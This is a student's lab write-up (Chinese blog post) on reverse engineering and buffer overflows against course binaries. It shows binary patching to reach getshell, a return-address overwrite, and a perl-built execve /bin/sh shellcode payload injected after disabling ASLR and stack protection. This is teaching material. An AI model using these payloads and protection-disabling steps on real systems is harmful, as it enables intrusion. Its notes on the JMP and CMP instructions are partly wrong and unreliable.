2017-2018-2 20155229《网络对抗技术》Exp1:逆向及Bof基础实践

逆向及Bof基础实践

实践基础知识

管道命令: 能够将一个命令的执行结果经过筛选,只保留需要的信息。

cut:选取指定列。
  • 按指定字符分隔:只显示第n
    列的数据

cut -d '分隔符' -f n

  • 选择特定范围内的数据

cut -c 起始字符的下标-结束字符的下标

grep:关键词搜索指定行。
  • grep [-参数] ‘关键词’ 文件

从指定文件中将符合关键词的行搜索出来(没用到管道)

  • 命令 | grep [-参数] ‘关键词’

前一个命令的执行结果输出给grep,并通过grep的关键词搜索将符合条件的行搜索出来。

sort:排序
  • sort [-参数] 文件

将文件中的数据按照指定字段排序

  • 命令 | sort [-参数]

使用管道,将前一个命令执行的结果按照指定字段进行排序。

wc:统计字数、行数、字符数
  • 命令 | wc [-参数]

输入输出重定向:

command > file //将输出重定向到 file。

command < file //将输入重定向到 file。

command >> file //将输出以追加的方式重定向到 file。

n > file //将文件描述符为 n 的文件重定向到 file。

n >> file //将文件描述符为 n 的文件以追加的方式重定向到 file。

EIP: 用来存储CPU要读取指令的地址,CPU通过EIP寄存器读取即将要执行的指令。每次CPU执行完相应的汇编指令之后,EIP寄存器的值就会增加。


实践内容

直接修改程序机器指令,改变程序执行流程

  • 先对pwn1进行复制备份——cp pwn1 pwn5229

  • 执行命令objdump -d pwn5229 | more对pwn5229文件进行反汇编。

  • 从上图得知,main函数中地址为80484b5的call 8048491指令调用处于地址8048491处的foo函数,该汇编指令的机器指令为e8 d7 ff ff ff,e8为“跳转”

  • foo函数和getshell的地址偏移量=8048491-804847d=14。

  • 想让main函数调用getshell,须将d7 ff ff ff改为c3 ff ff ff(d7-14=c3)

  • 用vi打开文件,输入%!xxd将文件改为十六进制文件。

  • 输入/e8d7找到要修改的内容 ,对其进行修改,再用%!xxd -r将文件转换为原来的二进制,保存退出。

  • 对文件反汇编,查看call指令是否掉用的是getshell

  • 运行文件,得到shell提示符。


通过构造输入参数,造成BOF攻击,改变程序执行流

  • pwn2这个文件正常运行下调用foo函数,这个函数有Buffer overflow漏洞。在于,输入的字符超出系统所先预留的缓冲区后,超出的部分会溢出。

  • 使用gdb对文件进行调试

  • 输入1111111122222222333333334444444455555555后,会发现eip中的值为5,将字符串修改为1111111122222222333333334444444412345678后,1234这4个字节溢出到返回地址

  • 将这4个字节替换为 getShell 的内存地址,输给pwn2文件,该文件就能运行getshell

  • getshell的内存地址之前已得出

  • 确定将12345678改为\x7d\x84\x04\x08

  • 输入命令perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

  • 用16进制查看指令xxd查看input文件内容

  • 使用管道符|,作为pwn2的输入。

  • (cat input; cat) | ./pwn2

  • 反观老师给出的两个空

这里读入字符串,但系统只预留了__字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址

上面的call调用foo,同时在堆栈上压上返回地址值:__________

通过计算,第一个空为28,第二个空为80484ba


注入Shellcode并执行

shellcode: 实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。一般是作为数据发送给受攻击服务器的,是溢出程序和蠕虫病毒的核心。

  • 修改一下设置
root@KaliYL:~# execstack -s pwn1    //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1    //查询文件的堆栈是否可执行
X pwn1
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
2
root@KaliYL:~# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
0

  • Linux下有两种基本构造攻击buf的方法:
retaddr+nop+shellcode

nop+shellcode+retaddr

但我们选择retaddr+nop+shellcode结构进行攻击buf,nop一是为了填充,二是作为“着陆区”。

perl -e 'print "A" x 32;print "\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

(\x4\x3\x2\x1是将覆盖到堆栈上的返回地址的位置)

打开终端注入这段攻击:

  • 打开另一个终端,用gdb进行调试

首先是找到pwn1的进程号:

然后调试这个进程

通过设置断点,来查看注入buf的内存地址

使用x/16x 0xffffd3bc,看到了0x01020304,根据之前选择的retaddr+nop+shellcode,地址为0xffffd3c0

将之前的\x4\x3\x2\x1更改,注入,查看,执行程序pwn1,攻击成功。



实验中遇到的问题及解决

1.在安装execsack时和运行pwn1时,无法安装。

  • 按照老师给的64位Kali无法顺利执行pwn1问题的解决方案链接进行安装,在使用apt-get updata时一直出现以下问题

  • 然后直接输入apt-get upgrade进行安装,执行apt-get install lib32ncurses5时,出现以下问题,重启虚拟机后,无法apt-get clean,被锁住了

  • /var/cache/apt/archives/lock删除后,成功运行,并且能够装execstack

实验总结及感想

  • 上学期娄老师的作业中有一项也是在实验楼上做缓冲溢出攻击,但当时我选择在虚拟机上做,结果把ubuntu做崩了,为了修复虚拟机,我并没有认真的将整个实验弄懂。通过做这次实践,返回去将自己的博客看了一遍,发现两个实验原理大致都相同,同时也收获了很多

  • 漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,所以攻击者能够在未授权的情况下通过漏洞进行访问或破坏系统。如果系统存在漏洞,攻击者就会通过网络植入木马、病毒等攻击整台电脑,窃取信息等;如果网站存在漏洞,网站可能被攻击者恶意操作、篡改,还可能将用户信息泄漏等。

  • NOP, JNE, JE, JMP, CMP汇编指令的机器码

  • NOP:即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。NOP指令会占用执行一个指令的CPU时间片。(机器码:90)

  • JNE:条件转移指令,如果不相等则跳转。(机器码:75)

  • JE:条件转移指令,如果相等则跳转。(机器码:74)

  • JNP:无条件的转移到指令指定的地址去执行从该地址开始的命令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)

  • CMP:比较指令,cmp 命令比较 File1 和 File2 参数指定的文件,并将结果写到标准输出。

posted @ 2018-03-18 14:21  Fer_佳  阅读(227)  评论(0编辑  收藏  举报